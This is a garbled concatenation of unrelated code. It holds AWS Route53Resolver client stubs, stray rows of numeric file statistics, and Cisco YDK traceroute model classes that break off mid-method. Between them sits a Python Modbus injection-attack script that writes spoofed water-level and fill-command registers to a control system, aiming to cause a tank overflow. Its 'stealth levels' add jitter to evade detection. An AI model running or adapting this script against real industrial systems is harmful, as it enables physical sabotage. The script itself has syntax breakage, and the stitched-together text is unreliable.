def update_resolver_endpoint(ResolverEndpointId=None, Name=None):
"""
Updates the name of an inbound or an outbound resolver endpoint.
See also: AWS API Documentation
Exceptions
:example: response = client.update_resolver_endpoint(
ResolverEndpointId='string',
Name='string'
)
:type ResolverEndpointId: string
:param ResolverEndpointId: [REQUIRED]\nThe ID of the resolver endpoint that you want to update.\n
:type Name: string
:param Name: The name of the resolver endpoint that you want to update.
:rtype: dict
ReturnsResponse Syntax
{
'ResolverEndpoint': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
}
}
Response Structure
(dict) --
ResolverEndpoint (dict) --
The response to an UpdateResolverEndpoint request.
Id (string) --
The ID of the resolver endpoint.
CreatorRequestId (string) --
A unique string that identifies the request that created the resolver endpoint. The CreatorRequestId allows failed requests to be retried without the risk of executing the operation twice.
Arn (string) --
The ARN (Amazon Resource Name) for the resolver endpoint.
Name (string) --
The name that you assigned to the resolver endpoint when you submitted a CreateResolverEndpoint request.
SecurityGroupIds (list) --
The ID of one or more security groups that control access to this VPC. The security group must include one or more inbound resolver rules.
(string) --
Direction (string) --
Indicates whether the resolver endpoint allows inbound or outbound DNS queries:
INBOUND : allows DNS queries to your VPC from your network or another VPC
OUTBOUND : allows DNS queries from your VPC to your network or another VPC
IpAddressCount (integer) --
The number of IP addresses that the resolver endpoint can use for DNS queries.
HostVPCId (string) --
The ID of the VPC that you want to create the resolver endpoint in.
Status (string) --
A code that specifies the current status of the resolver endpoint.
StatusMessage (string) --
A detailed description of the status of the resolver endpoint.
CreationTime (string) --
The date and time that the endpoint was created, in Unix time format and Coordinated Universal Time (UTC).
ModificationTime (string) --
The date and time that the endpoint was last modified, in Unix time format and Coordinated Universal Time (UTC).
Exceptions
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverEndpoint': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
}
}
:returns:
(string) --
"""
pass
def update_resolver_rule(ResolverRuleId=None, Config=None):
"""
Updates settings for a specified resolver rule. ResolverRuleId is required, and all other parameters are optional. If you don\'t specify a parameter, it retains its current value.
See also: AWS API Documentation
Exceptions
:example: response = client.update_resolver_rule(
ResolverRuleId='string',
Config={
'Name': 'string',
'TargetIps': [
{
'Ip': 'string',
'Port': 123
},
],
'ResolverEndpointId': 'string'
}
)
:type ResolverRuleId: string
:param ResolverRuleId: [REQUIRED]\nThe ID of the resolver rule that you want to update.\n
:type Config: dict
:param Config: [REQUIRED]\nThe new settings for the resolver rule.\n\nName (string) --The new name for the resolver rule. The name that you specify appears in the Resolver dashboard in the Route 53 console.\n\nTargetIps (list) --For DNS queries that originate in your VPC, the new IP addresses that you want to route outbound DNS queries to.\n\n(dict) --In a CreateResolverRule request, an array of the IPs that you want to forward DNS queries to.\n\nIp (string) -- [REQUIRED]One IP address that you want to forward DNS queries to. You can specify only IPv4 addresses.\n\nPort (integer) --The port at Ip that you want to forward DNS queries to.\n\n\n\n\n\nResolverEndpointId (string) --The ID of the new outbound resolver endpoint that you want to use to route DNS queries to the IP addresses that you specify in TargetIps .\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'ResolverRule': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'DomainName': 'string',
'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
'StatusMessage': 'string',
'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
'Name': 'string',
'TargetIps': [
{
'Ip': 'string',
'Port': 123
},
],
'ResolverEndpointId': 'string',
'OwnerId': 'string',
'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
}
}
Response Structure
(dict) --
ResolverRule (dict) --
The response to an UpdateResolverRule request.
Id (string) --
The ID that Resolver assigned to the resolver rule when you created it.
CreatorRequestId (string) --
A unique string that you specified when you created the resolver rule. CreatorRequestId identifies the request and allows failed requests to be retried without the risk of executing the operation twice.
Arn (string) --
The ARN (Amazon Resource Name) for the resolver rule specified by Id .
DomainName (string) --
DNS queries for this domain name are forwarded to the IP addresses that are specified in TargetIps . If a query matches multiple resolver rules (example.com and www.example.com), the query is routed using the resolver rule that contains the most specific domain name (www.example.com).
Status (string) --
A code that specifies the current status of the resolver rule.
StatusMessage (string) --
A detailed description of the status of a resolver rule.
RuleType (string) --
This value is always FORWARD . Other resolver rule types aren\'t supported.
Name (string) --
The name for the resolver rule, which you specified when you created the resolver rule.
TargetIps (list) --
An array that contains the IP addresses and ports that you want to forward
(dict) --
In a CreateResolverRule request, an array of the IPs that you want to forward DNS queries to.
Ip (string) --
One IP address that you want to forward DNS queries to. You can specify only IPv4 addresses.
Port (integer) --
The port at Ip that you want to forward DNS queries to.
ResolverEndpointId (string) --
The ID of the endpoint that the rule is associated with.
OwnerId (string) --
When a rule is shared with another AWS account, the account ID of the account that the rule is shared with.
ShareStatus (string) --
Whether the rules is shared and, if so, whether the current account is sharing the rule with another account, or another account is sharing the rule with the current account.
Exceptions
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.ResourceUnavailableException
Route53Resolver.Client.exceptions.LimitExceededException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverRule': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'DomainName': 'string',
'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
'StatusMessage': 'string',
'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
'Name': 'string',
'TargetIps': [
{
'Ip': 'string',
'Port': 123
},
],
'ResolverEndpointId': 'string',
'OwnerId': 'string',
'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
}
}
:returns:
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.ResourceUnavailableException
Route53Resolver.Client.exceptions.LimitExceededException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
"""
pass
| 35.045655
| 1,159
| 0.699351
| 11,202
| 95,184
| 5.922425
| 0.046956
| 0.052862
| 0.078034
| 0.018223
| 0.886499
| 0.869481
| 0.857754
| 0.847128
| 0.829447
| 0.822212
| 0
| 0.006636
| 0.221025
| 95,184
| 2,715
| 1,160
| 35.058564
| 0.888126
| 0.972201
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
8292ea81822b51fd2b10933286814918f6a1c4c2
| 6,753
|
py
|
Python
|
Attacker/NetworkedInjectionAttack.py
|
jamster112233/ICS_IDS
|
dac6abc3c8d6e840a21adedcb9e8dcfaa304b499
|
[
"BSD-3-Clause"
] | null | null | null |
Attacker/NetworkedInjectionAttack.py
|
jamster112233/ICS_IDS
|
dac6abc3c8d6e840a21adedcb9e8dcfaa304b499
|
[
"BSD-3-Clause"
] | null | null | null |
Attacker/NetworkedInjectionAttack.py
|
jamster112233/ICS_IDS
|
dac6abc3c8d6e840a21adedcb9e8dcfaa304b499
|
[
"BSD-3-Clause"
] | null | null | null |
import networkEncoder as ne
from pymodbus.client.sync import ModbusTcpClient
MODBUS_SLAVE = 'ms.ics.example.com'
random.seed(100)
response = ''
client = ModbusTcpClient(MODBUS_SLAVE)
print("Sensors online, enter injection attack type:")
print("[r]esponse - Fake slave values to trigger overflow")
print("[c]ommand - Fake master values to trigger overflow")
print("[q]uit")
while response != 'r' and response != 'c' and response != 'q':
response = input('>')
if response == 'q':
exit(0)
if response == 'r':
print("Enter stealth level:")
print("[1] - Blatantly obvious")
print("[2] - Plausible")
print("[3] - Harder to detect")
print("[4] - Hard to detect")
print("[q]uit")
while response != '1' and response != '2' and response != '3' and response != '4' and response != 'q':
response = input('>')
if response == 'q':
exit(0)
if response == '1':
while True:
#10,000L below optimum level
results = []
result = client.read_holding_registers(3, 4, unit=1)
waterLevel = ne.modbusDecode(0, 4, 4, result.registers)
outputs = []
levelElements = ne.modbusEncode(490000, 4, 4, outputs)
result.registers[0] = levelElements[0]
result.registers[1] = levelElements[1]
result.registers[2] = levelElements[2]
result.registers[3] = levelElements[3]
result.registers[20] = 1
write = client.write_registers(0, result.registers, unit=1)
if response == '2':
while True:
#1,000L below optimum level
results = []
result = client.read_holding_registers(3, , unit=1)
waterLevel = ne.modbusDecode(0, 4, 4, result.registers)
outputs = []
levelElements = ne.modbusEncode(499000, 4, 4, outputs)
result.registers[0] = levelElements[0]
result.registers[1] = levelElements[1]
result.registers[2] = levelElements[2]
result.registers[3] = levelElements[3]
result.registers[20] = 1
write = client.write_registers(3, result.registers, unit=1)
if response == '3':
while True:
#Constantly 1,500L below optimum level +- 15%
result = client.read_holding_registers(3, 19, unit=1)
waterLevel = ne.modbusDecode(0, 4, 4, result.registers)
waterLevel = 500000 - (1500 * (random.randint(85,115)/100))
outputs = []
levelElements = ne.modbusEncode(waterLevel, 4, 4, outputs)
result.registers[0] = levelElements[0]
result.registers[1] = levelElements[1]
result.registers[2] = levelElements[2]
result.registers[3] = levelElements[3]
result.registers[20] = 1
write = client.write_registers(3, result.registers, unit=1)
if response == '4':
while True:
# Constantly 1,500L below optimum level +- 15% + last add of water from master
result = client.read_holding_registers(3, 19, unit=1)
addWater = ne.modbusDecode(0, 2, 2, result.registers)
waterLevel = ne.modbusDecode(3, 4, 4, result.registers)
steamStep = ne.modbusDecode(13, 2, 4, result.registers)
outputs = []
waterLevel = 500000 - (1500 * (random.randint(85, 115) / 100)) + addWater
outputs = []
levelElements = ne.modbusEncode(waterLevel, 4, 4, outputs)
result.registers[0] = levelElements[0]
result.registers[1] = levelElements[1]
result.registers[2] = levelElements[2]
result.registers[3] = levelElements[3]
result.registers[20] = 1
write = client.write_registers(3, result.registers, unit=1)
if response == 'c':
print("Enter stealth level:")
print("[1] - Blatantly obvious")
print("[2] - Plausible")
print("[3] - Harder to detect")
print("[4] - Hard to detect")
print("[q]uit")
while response != '1' and response != '2' and response != '3' and response != '4' and response != 'q':
response = input('>')
if response == 'q':
exit(0)
if response == '1':
while True:
# 1,500L constant fill, no fire
result = client.read_holding_registers(0, 22, unit=1)
addWater = ne.modbusDecode(0, 2, 2, result.registers)
addWater = 1500
outputs = []
result.registers[0] = ne.modbusEncode(addWater, 2, 2, outputs)[0]
result.registers[1] = ne.modbusEncode(addWater, 2, 2, outputs)[1]
result.registers[2] = 1
result.registers[21] = 1
write = client.write_registers(0, result.registers, unit=1)
if response == '2':
while True:
# 1,500L constant fill, current fire state
result = client.read_holding_registers(0, 22, unit=1)
addWater = ne.modbusDecode(0, 2, 2, result.registers)
addWater = 1500
outputs = []
result.registers[0] = ne.modbusEncode(addWater, 2, 2, outputs)[0]
result.registers[1] = ne.modbusEncode(addWater, 2, 2, outputs)[1]
result.registers[21] = 1
write = client.write_registers(0, result.registers, unit=1)
if response == '3':
while True:
# 1,500L constant fill +- 10%, current fire state
result = client.read_holding_registers(0, 22, unit=1)
addWater = ne.modbusDecode(0, 2, 2, result.registers)
addWater = 1500 * (random.randint(90, 110) / 100)
outputs = []
result.registers[0] = ne.modbusEncode(addWater, 2, 2, outputs)[0]
result.registers[1] = ne.modbusEncode(addWater, 2, 2, outputs)[1]
result.registers[21] = 1
write = client.write_registers(0, result.registers, unit=1)
if response == '4':
while True:
# Add water value + 0-5%, if no fire, + 5-10% if fire
result = client.read_holding_registers(0, 22, unit=1)
addWater = ne.modbusDecode(0, 2, 2, result.registers)
addFire = ne.modbusDecode(2, 2, 0, result.registers)
if addFire:
addWater = 500 + (addWater * (random.randint(105, 110) / 100))
else:
addWater = 500 + (addWater * (random.randint(100, 105) / 100))
outputs = []
result.registers[0] = ne.modbusEncode(addWater, 2, 2, outputs)[0]
result.registers[1] = ne.modbusEncode(addWater, 2, 2, outputs)[1]
result.registers[21] = 1
write = client.write_registers(0, result.registers, unit=1)
client.close()
| 39.491228
| 106
| 0.574708
| 784
| 6,753
| 4.917092
| 0.139031
| 0.202335
| 0.058106
| 0.04773
| 0.867964
| 0.832425
| 0.819455
| 0.819455
| 0.798184
| 0.75201
| 0
| 0.071338
| 0.296313
| 6,753
| 170
| 107
| 39.723529
| 0.739899
| 0.051088
| 0
| 0.79562
| 0
| 0
| 0.064063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.014599
| null | null | 0.116788
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
82aff54a00188b96d46a87aa27129c0a52d5f3ed
| 44,283
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_traceroute_act.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_traceroute_act.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_traceroute_act.py
|
Maikor/ydk-py
|
b86c4a7c570ae3b2c5557d098420446df5de4929
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
""" Cisco_IOS_XR_traceroute_act
This module contains a collection of YANG definitions
for Cisco IOS\-XR ping action package configuration.
Copyright (c) 2016 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Traceroute(Entity):
"""
Trace route to destination
.. attribute:: input
**type**\: :py:class:`Input <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Input>`
.. attribute:: output
**type**\: :py:class:`Output <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute, self).__init__()
self._top_entity = None
self.yang_name = "traceroute"
self.yang_parent_name = "Cisco-IOS-XR-traceroute-act"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict()
self.input = Traceroute.Input()
self.input.parent = self
self._children_name_map["input"] = "input"
self.output = Traceroute.Output()
self.output.parent = self
self._children_name_map["output"] = "output"
self._segment_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute"
self._is_frozen = True
class Input(Entity):
"""
.. attribute:: destination
**type**\: :py:class:`Destination <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Input.Destination>`
.. attribute:: ipv4
**type**\: :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Input.Ipv4>`
.. attribute:: ipv6
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Input.Ipv6>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Input, self).__init__()
self.yang_name = "input"
self.yang_parent_name = "traceroute"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("destination", ("destination", Traceroute.Input.Destination)), ("ipv4", ("ipv4", Traceroute.Input.Ipv4)), ("ipv6", ("ipv6", Traceroute.Input.Ipv6))])
self._leafs = OrderedDict()
self.destination = Traceroute.Input.Destination()
self.destination.parent = self
self._children_name_map["destination"] = "destination"
self.ipv4 = Traceroute.Input.Ipv4()
self.ipv4.parent = self
self._children_name_map["ipv4"] = "ipv4"
self.ipv6 = Traceroute.Input.Ipv6()
self.ipv6.parent = self
self._children_name_map["ipv6"] = "ipv6"
self._segment_path = lambda: "input"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Input, [], name, value)
class Destination(Entity):
"""
.. attribute:: destination
Destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: source
Source address or interface
**type**\: str
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 3
.. attribute:: probe
Probe count
**type**\: int
**range:** 1..64
**default value**\: 3
.. attribute:: numeric
Numeric display only
**type**\: bool
.. attribute:: vrf_name
VRF name
**type**\: str
.. attribute:: min_ttl
minimum time to live
**type**\: int
**range:** 0..255
**default value**\: 1
.. attribute:: max_ttl
maximum time to live
**type**\: int
**range:** 0..255
**default value**\: 30
.. attribute:: port
Port numbe
**type**\: int
**range:** 0..65535
.. attribute:: verbose
verbose output
**type**\: bool
.. attribute:: priority
Priority of hte packet
**type**\: int
**range:** 0..15
.. attribute:: outgoing_interface
Outgoing interface, needed in case of traceroute to link local address
**type**\: str
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Input.Destination, self).__init__()
self.yang_name = "destination"
self.yang_parent_name = "input"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('destination', (YLeaf(YType.str, 'destination'), ['str'])),
('source', (YLeaf(YType.str, 'source'), ['str'])),
('timeout', (YLeaf(YType.uint32, 'timeout'), ['int'])),
('probe', (YLeaf(YType.uint16, 'probe'), ['int'])),
('numeric', (YLeaf(YType.boolean, 'numeric'), ['bool'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('min_ttl', (YLeaf(YType.uint16, 'min-ttl'), ['int'])),
('max_ttl', (YLeaf(YType.uint16, 'max-ttl'), ['int'])),
('port', (YLeaf(YType.uint32, 'port'), ['int'])),
('verbose', (YLeaf(YType.boolean, 'verbose'), ['bool'])),
('priority', (YLeaf(YType.uint16, 'priority'), ['int'])),
('outgoing_interface', (YLeaf(YType.str, 'outgoing-interface'), ['str'])),
])
self.destination = None
self.source = None
self.timeout = None
self.probe = None
self.numeric = None
self.vrf_name = None
self.min_ttl = None
self.max_ttl = None
self.port = None
self.verbose = None
self.priority = None
self.outgoing_interface = None
self._segment_path = lambda: "destination"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/input/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Input.Destination, [u'destination', u'source', u'timeout', u'probe', u'numeric', u'vrf_name', u'min_ttl', u'max_ttl', u'port', u'verbose', 'priority', 'outgoing_interface'], name, value)
class Ipv4(Entity):
"""
.. attribute:: destination
Destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: source
Source address or interface
**type**\: str
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 3
.. attribute:: probe
Probe count
**type**\: int
**range:** 1..64
**default value**\: 3
.. attribute:: numeric
Numeric display only
**type**\: bool
.. attribute:: vrf_name
VRF name
**type**\: str
.. attribute:: min_ttl
minimum time to live
**type**\: int
**range:** 0..255
**default value**\: 1
.. attribute:: max_ttl
maximum time to live
**type**\: int
**range:** 0..255
**default value**\: 30
.. attribute:: port
Port numbe
**type**\: int
**range:** 0..65535
.. attribute:: verbose
verbose output
**type**\: bool
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Input.Ipv4, self).__init__()
self.yang_name = "ipv4"
self.yang_parent_name = "input"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('destination', (YLeaf(YType.str, 'destination'), ['str'])),
('source', (YLeaf(YType.str, 'source'), ['str'])),
('timeout', (YLeaf(YType.uint32, 'timeout'), ['int'])),
('probe', (YLeaf(YType.uint16, 'probe'), ['int'])),
('numeric', (YLeaf(YType.boolean, 'numeric'), ['bool'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('min_ttl', (YLeaf(YType.uint16, 'min-ttl'), ['int'])),
('max_ttl', (YLeaf(YType.uint16, 'max-ttl'), ['int'])),
('port', (YLeaf(YType.uint32, 'port'), ['int'])),
('verbose', (YLeaf(YType.boolean, 'verbose'), ['bool'])),
])
self.destination = None
self.source = None
self.timeout = None
self.probe = None
self.numeric = None
self.vrf_name = None
self.min_ttl = None
self.max_ttl = None
self.port = None
self.verbose = None
self._segment_path = lambda: "ipv4"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/input/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Input.Ipv4, [u'destination', u'source', u'timeout', u'probe', u'numeric', u'vrf_name', u'min_ttl', u'max_ttl', u'port', u'verbose'], name, value)
class Ipv6(Entity):
"""
.. attribute:: destination
Destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: source
Source address or interface
**type**\: str
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 3
.. attribute:: probe
Probe count
**type**\: int
**range:** 1..64
**default value**\: 3
.. attribute:: numeric
Numeric display only
**type**\: bool
.. attribute:: vrf_name
VRF name
**type**\: str
.. attribute:: min_ttl
minimum time to live
**type**\: int
**range:** 0..255
**default value**\: 1
.. attribute:: max_ttl
maximum time to live
**type**\: int
**range:** 0..255
**default value**\: 30
.. attribute:: port
Port numbe
**type**\: int
**range:** 0..65535
.. attribute:: verbose
verbose output
**type**\: bool
.. attribute:: priority
Priority of hte packet
**type**\: int
**range:** 0..15
.. attribute:: outgoing_interface
Outgoing interface, needed in case of traceroute to link local address
**type**\: str
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Input.Ipv6, self).__init__()
self.yang_name = "ipv6"
self.yang_parent_name = "input"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('destination', (YLeaf(YType.str, 'destination'), ['str'])),
('source', (YLeaf(YType.str, 'source'), ['str'])),
('timeout', (YLeaf(YType.uint32, 'timeout'), ['int'])),
('probe', (YLeaf(YType.uint16, 'probe'), ['int'])),
('numeric', (YLeaf(YType.boolean, 'numeric'), ['bool'])),
('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])),
('min_ttl', (YLeaf(YType.uint16, 'min-ttl'), ['int'])),
('max_ttl', (YLeaf(YType.uint16, 'max-ttl'), ['int'])),
('port', (YLeaf(YType.uint32, 'port'), ['int'])),
('verbose', (YLeaf(YType.boolean, 'verbose'), ['bool'])),
('priority', (YLeaf(YType.uint16, 'priority'), ['int'])),
('outgoing_interface', (YLeaf(YType.str, 'outgoing-interface'), ['str'])),
])
self.destination = None
self.source = None
self.timeout = None
self.probe = None
self.numeric = None
self.vrf_name = None
self.min_ttl = None
self.max_ttl = None
self.port = None
self.verbose = None
self.priority = None
self.outgoing_interface = None
self._segment_path = lambda: "ipv6"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/input/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Input.Ipv6, [u'destination', u'source', u'timeout', u'probe', u'numeric', u'vrf_name', u'min_ttl', u'max_ttl', u'port', u'verbose', 'priority', 'outgoing_interface'], name, value)
class Output(Entity):
"""
.. attribute:: traceroute_response
**type**\: :py:class:`TracerouteResponse <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output, self).__init__()
self.yang_name = "output"
self.yang_parent_name = "traceroute"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("traceroute-response", ("traceroute_response", Traceroute.Output.TracerouteResponse))])
self._leafs = OrderedDict()
self.traceroute_response = Traceroute.Output.TracerouteResponse()
self.traceroute_response.parent = self
self._children_name_map["traceroute_response"] = "traceroute-response"
self._segment_path = lambda: "output"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output, [], name, value)
class TracerouteResponse(Entity):
"""
.. attribute:: ipv4
**type**\: :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv4>`
.. attribute:: ipv6
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv6>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse, self).__init__()
self.yang_name = "traceroute-response"
self.yang_parent_name = "output"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ipv4", ("ipv4", Traceroute.Output.TracerouteResponse.Ipv4)), ("ipv6", ("ipv6", Traceroute.Output.TracerouteResponse.Ipv6))])
self._leafs = OrderedDict()
self.ipv4 = Traceroute.Output.TracerouteResponse.Ipv4()
self.ipv4.parent = self
self._children_name_map["ipv4"] = "ipv4"
self.ipv6 = Traceroute.Output.TracerouteResponse.Ipv6()
self.ipv6.parent = self
self._children_name_map["ipv6"] = "ipv6"
self._segment_path = lambda: "traceroute-response"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse, [], name, value)
class Ipv4(Entity):
"""
.. attribute:: destination
Destination address or hostname
**type**\: str
.. attribute:: hops
**type**\: :py:class:`Hops <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv4.Hops>`
.. attribute:: verbose_output
Verbose output
**type**\: str
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv4, self).__init__()
self.yang_name = "ipv4"
self.yang_parent_name = "traceroute-response"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("hops", ("hops", Traceroute.Output.TracerouteResponse.Ipv4.Hops))])
self._leafs = OrderedDict([
('destination', (YLeaf(YType.str, 'destination'), ['str'])),
('verbose_output', (YLeaf(YType.str, 'verbose-output'), ['str'])),
])
self.destination = None
self.verbose_output = None
self.hops = Traceroute.Output.TracerouteResponse.Ipv4.Hops()
self.hops.parent = self
self._children_name_map["hops"] = "hops"
self._segment_path = lambda: "ipv4"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/traceroute-response/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv4, [u'destination', u'verbose_output'], name, value)
class Hops(Entity):
"""
.. attribute:: hop
**type**\: list of :py:class:`Hop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv4.Hops, self).__init__()
self.yang_name = "hops"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("hop", ("hop", Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop))])
self._leafs = OrderedDict()
self.hop = YList(self)
self._segment_path = lambda: "hops"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/traceroute-response/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
